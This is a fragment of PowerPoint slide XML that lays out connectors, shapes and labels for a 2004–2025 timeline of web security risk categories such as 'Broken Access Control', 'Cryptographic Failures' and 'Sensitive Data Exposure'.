            <a:tailEnd type="none" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1256" name="Connector: Curved 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{393B085E-70AC-50E9-457E-3E9294CAC13E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1230" idx="3"/>
            <a:endCxn id="1226" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="4406220"/>
            <a:ext cx="343440" cy="48564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4" name="Connector: Curved 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{936626A8-E7C5-C9C2-C823-899DDEEB6B6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1211" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966560" y="2917980"/>
            <a:ext cx="35928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59" name="Connector: Curved 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4992B1C6-8FBA-FA8C-E262-496A3035AE47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1219" idx="3"/>
            <a:endCxn id="1245" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="3414060"/>
            <a:ext cx="342720" cy="48852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17" name="Connector: Curved 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5195953-7A64-E3D6-0371-4D16F2837814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1221" idx="3"/>
            <a:endCxn id="1295" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517880" y="2403720"/>
            <a:ext cx="357480" cy="1506600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50403"/>
              <a:gd name="adj2" fmla="val 49976"/>
              <a:gd name="adj3" fmla="val 49596"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="3333CC">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1314" name="Straight Arrow Connector 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{765C1547-F8F9-BE37-F149-AB25AD531898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922280" y="5395680"/>
            <a:ext cx="407160" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="3333CC">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="Connector: Curved 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57644A42-152B-9A32-C6CB-796CEF7062CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163700" y="2442754"/>
            <a:ext cx="321120" cy="987840"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Connector: Curved 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6779E41C-727B-70C6-C0D5-76F6BB4EAAD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2420280" y="1419840"/>
            <a:ext cx="349560" cy="505440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Connector: Curved 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C72C8E32-E9F9-6350-4809-401C4257650B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="1925460"/>
            <a:ext cx="321480" cy="3969360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24322"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9674152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96C09-C14F-6334-887B-576982DAC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or: Curved 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61CD0AB3-61F0-5E61-9429-78FF75260651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163700" y="2442754"/>
            <a:ext cx="321120" cy="987840"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1277" name="Straight Arrow Connector 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66F509EA-95CC-AC7D-E9E6-8FF3C399E9E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199920" y="4888080"/>
            <a:ext cx="407520" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="FFE575"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1309" name="TextBox 188">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BADBA9-07B1-744D-C53F-3E047BAE6E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384480" y="957600"/>
            <a:ext cx="8374680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0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>2004                        2007                        2010                         2013                       2017                         2021                        2025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291" name="Connector: Curved 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36BF15D8-DCA6-3380-0C39-9ADA47F76EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1242" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="4163445"/>
            <a:ext cx="179640" cy="1731375"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="none" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A7D3B1F-3C85-8D1E-B7E9-B35781352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80" y="279720"/>
            <a:ext cx="8224560" cy="80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algn="ctr" defTabSz="446040">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C5000B"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="PlaceHolder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEBB944F-B434-A178-70C7-24AAFAA5E811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="73"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7884360" y="6211440"/>
            <a:ext cx="775080" cy="469440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="r" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0" algn="r" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{E01EDF43-9989-4485-A3FE-CFD0EC2751AF}" type="slidenum">
              <a:rPr lang="en-US" sz="120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54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189" name="Connector: Curved 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8CD0FA1-69B6-DC00-B397-FAC312454D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1216" idx="3"/>
            <a:endCxn id="1195" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="1429380"/>
            <a:ext cx="341640" cy="19846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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="CustomShape 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29BEA6DD-4F3F-C964-8EF5-05EB5236D64E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="1220040"/>
            <a:ext cx="91296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200" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Unvalidated Input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-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1191" name="CustomShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93692997-BA4F-F62A-CB1D-752759AE400A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="1220040"/>
            <a:ext cx="9313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2" name="CustomShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EACADA0-EADA-EC42-FE98-097B478ADD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="1220040"/>
            <a:ext cx="9295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3" name="CustomShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8CFAE2-993F-FD10-B11F-6913D3C8299A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="1220040"/>
            <a:ext cx="9259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4" name="CustomShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C765497D-ABA5-80AD-F353-1CD8311155C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="1220040"/>
            <a:ext cx="9277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5" name="CustomShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53FB9C24-5CB9-716D-8F43-D80CB5C8EEB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="122004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pc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Broken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000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196" name="CustomShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3B9E2F3-5586-7CD7-B40F-F35CAB9A5698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226080" y="1716120"/>
            <a:ext cx="93780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Broken Access Control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197" name="CustomShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BECA4368-6955-6EE1-047A-1B0FF4CCE9F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="1716120"/>
            <a:ext cx="9313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8" name="CustomShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37748F5D-9B6F-AD20-3916-B22A54923AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="1714680"/>
            <a:ext cx="9295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9" name="CustomShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4DFA084-F0B5-015B-8566-A79CDA8AB15E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="171612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Broken Authentication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00" name="CustomShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B007619-11BC-302E-EF0A-6ABB87B39584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="171612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Broken Auth. &amp; Session Mngt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01" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D71BB187-D437-138A-3CB3-5150CC58ABBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="171612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Cryptographic Failures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02" name="CustomShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4297A268-AF9F-CC80-D3AB-0D1190D847F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="221220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Broken Auth. &amp; Session Mngt.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03" name="CustomShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAD5BCBA-1D7B-D98C-837D-0A3E7D73E2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="2212200"/>
            <a:ext cx="9313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Malicious File Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1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4" name="CustomShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A95729A3-D839-202A-3E8B-2160A2149611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="220932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Broken Auth. &amp; Session Mngt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05" name="CustomShape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A654517B-53CD-F13B-F6F0-9F1BB8DAAB44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="221220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Sensitive Data Exposure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06" name="CustomShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E3C936-58D0-FFFF-08F8-13FC2BF4810B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="2212200"/>
            <a:ext cx="9277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7" name="CustomShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{526FA541-80C2-EC97-E3FD-B19458280B94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="2212200"/>
            <a:ext cx="92448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8" name="CustomShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92CA9D8-8417-20CE-42C3-2E47CE137C85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="2708640"/>
            <a:ext cx="91296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9" name="CustomShape 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{704F7691-6F6D-4915-E1E5-B57E771D51EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485000" y="270396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10" name="CustomShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDEEBEFB-4F59-53C5-773A-E86B5C9481EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="270396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11" name="CustomShape 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C3DD4C7-BE75-9544-5E81-20AF55B77617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="270864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12" name="CustomShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{996E8BC4-A739-84EB-D977-7A43E12A4A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="2708640"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="FFE575"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr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</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1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Design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13" name="CustomShape 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6B1D5F-3859-6824-62EC-8B4D1B565B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239400" y="3204720"/>
            <a:ext cx="9115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200" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
